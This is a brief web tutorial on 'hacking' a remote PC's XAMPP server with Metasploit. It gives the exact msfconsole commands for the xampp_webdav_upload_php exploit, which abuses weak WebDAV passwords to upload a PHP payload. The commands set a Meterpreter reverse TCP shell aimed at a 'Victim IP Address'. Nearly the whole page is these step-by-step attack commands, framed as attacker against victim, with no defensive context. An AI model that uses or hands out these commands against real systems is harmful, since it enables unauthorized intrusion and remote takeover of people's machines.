How to Hack XAMPP of Remote PC using Metasploit

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Exploit Targets


Windows XP, Windows 7


Attacker: Backtrack 5

Victim PC: Windows 7

Check Installation XAMPP in Victim PC

To test, launch your browser and type you should see the following display:

(Here is victim IP)

Open backtrack terminal type msfconsole

msf > use exploit/windows/http/xampp_webdav_upload_php

msf exploit (xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp

msf exploit(xampp_webdav_upload_php) > set lhost [Local IP Address]

msf exploit(xampp_webdav_upload_php) > set rhost [Victim IP Address]

msf exploit(xampp_webdav_upload_php) > exploit

For More Meterpreter Commands Click Here

Leave a Reply

Your email address will not be published. Required fields are marked *